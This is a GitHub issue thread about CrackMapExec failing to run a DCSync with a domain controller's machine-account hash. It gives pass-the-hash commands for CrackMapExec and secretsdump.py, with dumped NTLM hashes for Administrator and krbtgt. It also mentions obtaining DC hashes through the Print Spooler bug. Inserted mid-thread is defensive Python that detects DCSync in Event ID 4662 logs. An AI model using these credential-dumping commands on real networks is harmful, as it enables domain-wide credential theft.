byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License

DCSync privileges only work if a user is an admin #407

Status: Closed (sebrink closed this issue 4 years ago)

sebrink commented 4 years ago

Describe the bug

An account with DCSync privileges cannot utilize these privileges unless it is an admin.

To Reproduce

An example of the machine account with DCSync privileges being unable to do a DCSync.

root@wpad:~# cme smb BART.sim.local -u 'BART$' -H 'f80819837d5170c19b056a5547d58423'
SMB         10.10.10.200    445    BART             [*] Windows Server 2019 Standard Evaluation 17763 x64 (name:BART) (domain:sim.local) (signing:True) (SMBv1:True)
SMB         10.10.10.200    445    BART             [+] sim.local\BART$ f80819837d5170c19b056a5547d58423 
root@wpad:~# cme smb BART.sim.local -u 'BART$' -H 'f80819837d5170c19b056a5547d58423' --ntds drsuapi
SMB         10.10.10.200    445    BART             [*] Windows Server 2019 Standard Evaluation 17763 x64 (name:BART) (domain:sim.local) (signing:True) (SMBv1:True)
SMB         10.10.10.200    445    BART             [+] sim.local\BART$ f80819837d5170c19b056a5547d58423 

An example of doing the same thing with secretsdump.py, but successfully doing a DCSync.

root@wpad:~/impacket/examples# python3 secretsdump.py -hashes ':f80819837d5170c19b056a5547d58423' 'BART$@BART.sim.local'
Impacket v0.9.22.dev1+20200804.145312.110b886c - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf4eafe7c79bd8d3a14891e5a8561e54:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3a3af955c3eb36b1494dbed80c28e060:::

Crackmapexec info

Additional context

Maybe add an override flag for when a user knows their user can do this?

mpgn commented 4 years ago

Hello,

I'm wondering in which case you can have a user with DCSync priv without being an admin?

sebrink commented 4 years ago

The computer accounts of domain controllers have DCSync privileges by default and are not local admins on the machine.

During a pentest it's common to get the NTLM of a DC machine account from the Print Spooler Bug in conjunction with NTLMv1 being enabled in the environment (https://github.com/NotMedic/NetNTLMtoSilverTicket).
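The point made above, that domain-controller computer accounts hold replication rights by default while other principals normally should not, is also the basis for detecting DCSync on the defensive side. The following is an added example, not CrackMapExec or impacket code: it scans simplified Windows Security Event ID 4662 records and flags any principal other than a known DC machine account that exercises the DS-Replication-Get-Changes control access rights. The event field names (SubjectUserName, SubjectDomainName, Properties, ObjectName) follow the Windows event XML schema, the three right GUIDs are the well-known Active Directory control access right identifiers, and the sample events are constructed for this example (the domain and DC name mirror the thread, the other accounts are made up).

```python
"""Flag Event ID 4662 accesses that exercise DCSync replication rights from a
principal that is not a known domain-controller computer account.

Added example, not code from CrackMapExec or impacket. The records below are
constructed; in practice they would come from the DC's Security log.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable

# Well-known AD control access right GUIDs that together permit replicating secrets.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_FILTERED,
}

# The 4662 Properties field lists access-right GUIDs, usually in braces, one per line.
GUID_RE = re.compile(r"\{?([0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})\}?")


@dataclass(frozen=True)
class Finding:
    subject: str            # DOMAIN\account that exercised the right
    rights: tuple[str, ...]  # replication right GUIDs seen in the event
    reason: str


def expected_replicators(dc_hostnames: Iterable[str]) -> set[str]:
    """Machine accounts of the domain controllers (HOSTNAME$), which replicate legitimately."""
    return {f"{h.upper()}$" for h in dc_hostnames}


def replication_rights_in(properties: str) -> tuple[str, ...]:
    """Return the replication right GUIDs present in a 4662 Properties field, in order."""
    found: list[str] = []
    for match in GUID_RE.finditer(properties):
        guid = match.group(1).lower()
        if guid in REPLICATION_RIGHTS and guid not in found:
            found.append(guid)
    return tuple(found)


def detect_dcsync(events: Iterable[dict], dc_hostnames: Iterable[str],
                  allowlist: Iterable[str] = ()) -> list[Finding]:
    """Findings for 4662 events that use replication rights from a subject that is
    neither a DC computer account nor an explicitly allow-listed DOMAIN\\account
    (for instance a directory synchronisation service account)."""
    dc_accounts = expected_replicators(dc_hostnames)
    allowed = {a.lower() for a in allowlist}
    findings: list[Finding] = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue  # ordinary directory access, not replication
        name = ev["SubjectUserName"]
        subject = f"{ev['SubjectDomainName']}\\{name}"
        if name.upper() in dc_accounts:
            continue  # DC-to-DC replication is expected, as the thread notes
        if subject.lower() in allowed:
            continue
        reason = ("computer account that is not a known domain controller"
                  if name.endswith("$") else "user account exercising replication rights")
        findings.append(Finding(subject, rights, reason))
    return findings


# Constructed sample events; the last GUID is filler standing in for a non-replication right.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "SIM", "SubjectUserName": "BART$",
     "ObjectName": "DC=sim,DC=local",
     "Properties": "Control Access\n {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   " {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "SIM", "SubjectUserName": "jdoe",
     "ObjectName": "DC=sim,DC=local",
     "Properties": "Control Access\n {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   " {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "SIM", "SubjectUserName": "WS01$",
     "ObjectName": "DC=sim,DC=local",
     "Properties": "Control Access\n {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "SIM", "SubjectUserName": "svc_backup",
     "ObjectName": "CN=jdoe,CN=Users,DC=sim,DC=local",
     "Properties": "Write Property\n {00000000-0000-0000-0000-000000000001}"},
]

if __name__ == "__main__":
    for f in detect_dcsync(SAMPLE_EVENTS, dc_hostnames=["bart"]):
        print(f"{f.subject}: {f.reason} ({', '.join(f.rights)})")
```

Run against the constructed records, only SIM\jdoe and SIM\WS01$ are reported; BART$ is skipped because it is the DC from the thread, and svc_backup is skipped because its event carries no replication right. The allowlist exists because some non-DC principals legitimately replicate (directory synchronisation services), so an alert rule should name them explicitly rather than suppress every computer account.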

mpgn commented 4 years ago

Agreed, I will do it then! :+1: